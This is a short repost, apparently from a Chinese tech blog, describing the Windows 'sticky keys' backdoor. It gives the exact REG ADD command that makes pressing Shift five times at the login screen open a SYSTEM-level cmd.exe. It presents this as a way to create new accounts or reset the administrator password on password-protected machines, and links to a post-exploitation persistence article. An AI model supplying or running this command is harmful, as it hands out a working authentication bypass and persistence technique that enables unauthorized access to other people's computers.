admin管理员组文章数量:1631195
This backdoor allows you to run command prompt (cmd.exe) with system privilege from the Windows 7 login screen. So with a system privilege command prompt in your hands, you can actually do a lot of stuff including creating new accounts to resetting administrator password to gain access to the password protected Windows. Check out these step-by-step instructions.
1.click on the cmd.exe and select “run as administrator”,ENTER
"REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
2.turn on sticky keys or high contrast using the hotkeys (Shift x 5 OR Alt+Shift+PrintScreen). and you will open cmd.exe
if you have any question,call me
reference material:
https://www.raymond/blog/backdoor-reset-administrator-password-add-new-user-windows-7/
https://godlikesecurity/index.php/2016/10/14/post-exploitation-persisting-and-triggering-backdoors-in-windows/
版权声明:本文标题:windows shift backdoor(windows shift 后门) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1729088966a1185926.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论